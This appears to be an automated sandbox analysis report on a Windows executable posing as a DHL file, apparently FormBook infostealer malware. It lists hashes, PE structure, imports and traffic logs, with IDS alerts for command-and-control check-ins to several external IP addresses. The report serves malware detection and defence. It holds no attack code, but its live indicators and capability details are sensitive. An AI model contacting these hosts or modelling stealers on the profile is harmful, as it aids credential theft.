TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL 745-12302024.exe
File size:	1'569'792 bytes
MD5:	8cc198852f8e33a75fe06dc4044794f9
SHA1:	db40b81c82d39682afbb5b337a02779a05bd31ca
SHA256:	30de76c4187db01e3b49096449be96c83f0404b9c2361c30d0fb933fa791d6d6
SHA512:	4110024e24f910435b7da8c03b237acb79898d2fcab8fc8b8b8acd7acf8323297bedf8eafc229a026dbe0fb8a854ce340d327a706bbba6128eab51a2256c5a20
SSDEEP:	24576:rqDEvCTbMWu7rQYlBQcBiT6rprG8aq0d7Zx+8ea/NDhfP3mjFWiqtZ4vcLila9:rTvC/MTQYxsWR7aq0dYa/NDNPMq6kW
TLSH:	9375D0027381C062FF9B92334B5AF75157BC69260123E62F13A81D7ABE705B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67733084 [Mon Dec 30 23:45:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FE024E98D13h
jmp 00007FE024E9861Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE024E987FDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE024E987CAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FE024E9B3BDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FE024E9B408h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FE024E9B3F1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xa8814	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17d000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xa8814	0xa8a00	c5fbbfad9090499683a4eadc6dddc52d	False	0.9607825820051891	data	7.9591953583687065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17d000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x9fadc	data			1.0003149635192738
RT_GROUP_ICON	0x17c294	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x17c30c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x17c320	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x17c334	0x14	data	English	Great Britain	1.25
RT_VERSION	0x17c348	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x17c424	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T09:28:49.799536+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49710	154.215.72.110	80	TCP
2024-12-31T09:29:21.787548+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49715	116.50.37.244	80	TCP
2024-12-31T09:30:43.689743+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49722	85.159.66.93	80	TCP
2024-12-31T09:30:56.983092+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49726	91.195.240.94	80	TCP
2024-12-31T09:31:18.477757+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49730	66.29.149.46	80	TCP
2024-12-31T09:31:31.922692+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49734	195.110.124.133	80	TCP
2024-12-31T09:32:01.603230+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49738	217.196.55.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:28:48.886260986 CET	49710	80	192.168.2.9	154.215.72.110
Dec 31, 2024 09:28:48.891088009 CET	80	49710	154.215.72.110	192.168.2.9
Dec 31, 2024 09:28:48.891156912 CET	49710	80	192.168.2.9	154.215.72.110
Dec 31, 2024 09:28:48.893776894 CET	49710	80	192.168.2.9	154.215.72.110
Dec 31, 2024 09:28:48.898531914 CET	80	49710	154.215.72.110	192.168.2.9
Dec 31, 2024 09:28:49.799285889 CET	80	49710	154.215.72.110	192.168.2.9
Dec 31, 2024 09:28:49.799480915 CET	80	49710	154.215.72.110	192.168.2.9
Dec 31, 2024 09:28:49.799535990 CET	49710	80	192.168.2.9	154.215.72.110
Dec 31, 2024 09:28:49.802768946 CET	49710	80	192.168.2.9	154.215.72.110
Dec 31, 2024 09:28:49.807532072 CET	80	49710	154.215.72.110	192.168.2.9
Dec 31, 2024 09:29:13.295269966 CET	49712	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:13.300019026 CET	80	49712	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:13.300088882 CET	49712	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:13.302051067 CET	49712	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:13.306816101 CET	80	49712	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:14.169528008 CET	80	49712	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:14.169596910 CET	80	49712	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:14.169646978 CET	49712	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:14.807955980 CET	49712	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:15.824014902 CET	49713	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:15.828911066 CET	80	49713	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:15.829073906 CET	49713	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:15.831110001 CET	49713	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:15.835932970 CET	80	49713	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:16.725893974 CET	80	49713	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:16.726110935 CET	80	49713	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:16.726177931 CET	49713	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:17.337239027 CET	49713	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:18.356645107 CET	49714	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:18.361567020 CET	80	49714	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:18.361634016 CET	49714	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:18.363711119 CET	49714	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:18.368532896 CET	80	49714	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:18.368670940 CET	80	49714	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:19.226843119 CET	80	49714	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:19.226914883 CET	80	49714	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:19.226980925 CET	49714	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:19.868824959 CET	49714	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:20.886719942 CET	49715	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:20.891577005 CET	80	49715	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:20.891763926 CET	49715	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:20.893740892 CET	49715	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:20.898550034 CET	80	49715	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:21.787378073 CET	80	49715	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:21.787457943 CET	80	49715	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:21.787548065 CET	49715	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:21.790121078 CET	49715	80	192.168.2.9	116.50.37.244
Dec 31, 2024 09:29:21.794939041 CET	80	49715	116.50.37.244	192.168.2.9
Dec 31, 2024 09:29:35.164222002 CET	49716	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:35.169673920 CET	80	49716	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:35.169784069 CET	49716	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:35.178477049 CET	49716	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:35.183243990 CET	80	49716	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:36.680171013 CET	49716	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:36.685172081 CET	80	49716	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:36.685250998 CET	49716	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:37.732068062 CET	49719	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:37.736910105 CET	80	49719	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:37.736993074 CET	49719	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:37.797203064 CET	49719	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:37.802054882 CET	80	49719	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:39.320941925 CET	49719	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:39.325880051 CET	80	49719	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:39.325958014 CET	49719	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:40.349071980 CET	49721	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:40.353852987 CET	80	49721	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:40.353918076 CET	49721	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:40.391601086 CET	49721	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:40.396469116 CET	80	49721	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:40.396590948 CET	80	49721	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:41.898899078 CET	49721	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:41.903882027 CET	80	49721	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:41.903939009 CET	49721	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:42.919255972 CET	49722	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:42.924154043 CET	80	49722	85.159.66.93	192.168.2.9
Dec 31, 2024 09:29:42.924242973 CET	49722	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:42.926186085 CET	49722	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:29:42.930967093 CET	80	49722	85.159.66.93	192.168.2.9
Dec 31, 2024 09:30:43.689555883 CET	80	49722	85.159.66.93	192.168.2.9
Dec 31, 2024 09:30:43.689596891 CET	80	49722	85.159.66.93	192.168.2.9
Dec 31, 2024 09:30:43.689743042 CET	49722	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:30:43.692969084 CET	49722	80	192.168.2.9	85.159.66.93
Dec 31, 2024 09:30:43.698801994 CET	80	49722	85.159.66.93	192.168.2.9
Dec 31, 2024 09:30:48.719050884 CET	49723	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:48.723977089 CET	80	49723	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:48.724088907 CET	49723	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:48.725971937 CET	49723	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:48.730779886 CET	80	49723	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:49.372072935 CET	80	49723	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:49.372100115 CET	80	49723	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:49.372155905 CET	49723	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:50.227260113 CET	49723	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:51.247025013 CET	49724	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:51.251935005 CET	80	49724	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:51.252080917 CET	49724	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:51.253907919 CET	49724	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:51.258713961 CET	80	49724	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:51.895385027 CET	80	49724	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:51.895415068 CET	80	49724	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:51.895608902 CET	49724	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:52.759156942 CET	49724	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:53.778484106 CET	49725	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:53.783380032 CET	80	49725	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:53.783449888 CET	49725	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:53.785846949 CET	49725	80	192.168.2.9	91.195.240.94
Dec 31, 2024 09:30:53.790632963 CET	80	49725	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:53.790829897 CET	80	49725	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:54.541626930 CET	80	49725	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:54.541739941 CET	80	49725	91.195.240.94	192.168.2.9
Dec 31, 2024 09:30:54.541913986 CET	49725	80	192.168.2.9	91.195.240.94
